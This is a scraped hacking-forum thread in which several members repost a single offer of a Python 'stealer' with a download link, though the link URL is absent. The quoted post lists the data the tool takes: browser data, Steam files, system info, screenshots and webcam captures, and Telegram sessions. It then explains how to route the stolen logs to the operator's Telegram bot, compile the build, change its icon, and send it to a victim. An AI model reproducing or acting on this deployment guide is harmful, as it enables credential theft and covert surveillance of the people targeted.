This post is by a banned member (xxphxx) - Unhide
26 June, 2024 - 08:52 AM
Reply
(06 February, 2024 - 03:37 PM)Scared Wrote: Show MoreHere is a simple stealer written in python
I recommend always running this type of program under a virtual/rdp machine, be careful !
Download link :
Features :
- Browsers (firefox,chrome,opera)
- Steam Files
- System Info
- Screenshot/Webcam
- Telegram Session
All logs will be sent to your telegram bot
Tutorial :
1) Create a telegram bot and launch it, send it any message ( https://t.me/BotFather )
2) Copy the bot token (After creating the bot, the botfather will issue a token )
3) Paste the token between the quotes in the main.py file ( TOKEN = "YOUR token ")
4) Get the chat ID of your telegram account from the bot ( https://t.me/getidsbot )
5) Insert the chat ID between the quotes in the main.py file (CHAT_ID = "YOUR CHAT ID")
6 ) Run Compile.bat
After these steps, a stealer build will appear in the dist folder, which can be sent to the victim.
To change the icon, simply replace the icon.ico file with your icon with the same name
Known Error :
If you have problems with the cv2 module, then follow these steps:
1. Option - solve the problem yourself via Google
2. Option - delete these lines in the main.py file :
from modules.system import webcam
webcam.Selfie()
Then delete the webcam file. py in the modules/system folder
If during compilation there is an error like this:
The 'typing' package is an obsolete backport of a standard library package and is incompatible with PyInstaller. Please pip uninstall typing then try again.
The specified file cannot be found.
The specified file cannot be found.
To continue, press any key. . .
Then enter into the console: pip uninstall typing and then enter “y”
Thanks
This post is by a banned member (koskesh1231) - Unhide
27 June, 2024 - 02:07 AM
Reply
This post is by a banned member (rasheed1232) - Unhide
29 June, 2024 - 03:38 AM
Reply
(06 February, 2024 - 03:37 PM)Scared Wrote: Show MoreHere is a simple stealer written in python
I recommend always running this type of program under a virtual/rdp machine, be careful !
Download link :
Features :
- Browsers (firefox,chrome,opera)
- Steam Files
- System Info
- Screenshot/Webcam
- Telegram Session
All logs will be sent to your telegram bot
Tutorial :
1) Create a telegram bot and launch it, send it any message ( https://t.me/BotFather )
2) Copy the bot token (After creating the bot, the botfather will issue a token )
3) Paste the token between the quotes in the main.py file ( TOKEN = "YOUR token ")
4) Get the chat ID of your telegram account from the bot ( https://t.me/getidsbot )
5) Insert the chat ID between the quotes in the main.py file (CHAT_ID = "YOUR CHAT ID")
6 ) Run Compile.bat
After these steps, a stealer build will appear in the dist folder, which can be sent to the victim.
To change the icon, simply replace the icon.ico file with your icon with the same name
Known Error :
If you have problems with the cv2 module, then follow these steps:
1. Option - solve the problem yourself via Google
2. Option - delete these lines in the main.py file :
from modules.system import webcam
webcam.Selfie()
Then delete the webcam file. py in the modules/system folder
If during compilation there is an error like this:
The 'typing' package is an obsolete backport of a standard library package and is incompatible with PyInstaller. Please pip uninstall typing then try again.
The specified file cannot be found.
The specified file cannot be found.
To continue, press any key. . .
Then enter into the console: pip uninstall typing and then enter “y” nmn n
This post is by a banned member (Riggzwheeler) - Unhide
06 August, 2024 - 06:46 AM
Reply
This post is by a banned member (xav123q) - Unhide
13 August, 2024 - 10:45 AM
Reply
This post is by a banned member (lucasbeatsSs) - Unhide
20 August, 2024 - 03:52 AM
Reply
(06 February, 2024 - 03:37 PM)Scared Wrote: Show MoreHere is a simple stealer written in python
I recommend always running this type of program under a virtual/rdp machine, be careful !
Download link :
Features :
- Browsers (firefox,chrome,opera)
- Steam Files
- System Info
- Screenshot/Webcam
- Telegram Session
All logs will be sent to your telegram bot
Tutorial :
1) Create a telegram bot and launch it, send it any message ( https://t.me/BotFather )
2) Copy the bot token (After creating the bot, the botfather will issue a token )
3) Paste the token between the quotes in the main.py file ( TOKEN = "YOUR token ")
4) Get the chat ID of your telegram account from the bot ( https://t.me/getidsbot )
5) Insert the chat ID between the quotes in the main.py file (CHAT_ID = "YOUR CHAT ID")
6 ) Run Compile.bat
After these steps, a stealer build will appear in the dist folder, which can be sent to the victim.
To change the icon, simply replace the icon.ico file with your icon with the same name
Known Error :
If you have problems with the cv2 module, then follow these steps:
1. Option - solve the problem yourself via Google
2. Option - delete these lines in the main.py file :
from modules.system import webcam
webcam.Selfie()
Then delete the webcam file. py in the modules/system folder
If during compilation there is an error like this:
The 'typing' package is an obsolete backport of a standard library package and is incompatible with PyInstaller. Please pip uninstall typing then try again.
The specified file cannot be found.
The specified file cannot be found.
To continue, press any key. . .
Then enter into the console: pip uninstall typing and then enter “y” nice bro
This post is by a banned member (wideboy750) - Unhide
30 August, 2024 - 06:49 PM
Reply
This post is by a banned member (cryptix099) - Unhide
17 November, 2024 - 01:18 PM
Reply
(06 February, 2024 - 03:37 PM)Scared Wrote: Show MoreHere is a simple stealer written in python
I recommend always running this type of program under a virtual/rdp machine, be careful !
Download link :
Features :
- Browsers (firefox,chrome,opera)
- Steam Files
- System Info
- Screenshot/Webcam
- Telegram Session
All logs will be sent to your telegram bot
Tutorial :
1) Create a telegram bot and launch it, send it any message ( https://t.me/BotFather )
2) Copy the bot token (After creating the bot, the botfather will issue a token )
3) Paste the token between the quotes in the main.py file ( TOKEN = "YOUR token ")
4) Get the chat ID of your telegram account from the bot ( https://t.me/getidsbot )
5) Insert the chat ID between the quotes in the main.py file (CHAT_ID = "YOUR CHAT ID")
6 ) Run Compile.bat
After these steps, a stealer build will appear in the dist folder, which can be sent to the victim.
To change the icon, simply replace the icon.ico file with your icon with the same name
Known Error :
If you have problems with the cv2 module, then follow these steps:
1. Option - solve the problem yourself via Google
2. Option - delete these lines in the main.py file :
from modules.system import webcam
webcam.Selfie()
Then delete the webcam file. py in the modules/system folder
If during compilation there is an error like this:
The 'typing' package is an obsolete backport of a standard library package and is incompatible with PyInstaller. Please pip uninstall typing then try again.
The specified file cannot be found.
The specified file cannot be found.
To continue, press any key. . .
Then enter into the console: pip uninstall typing and then enter “y” thanks
|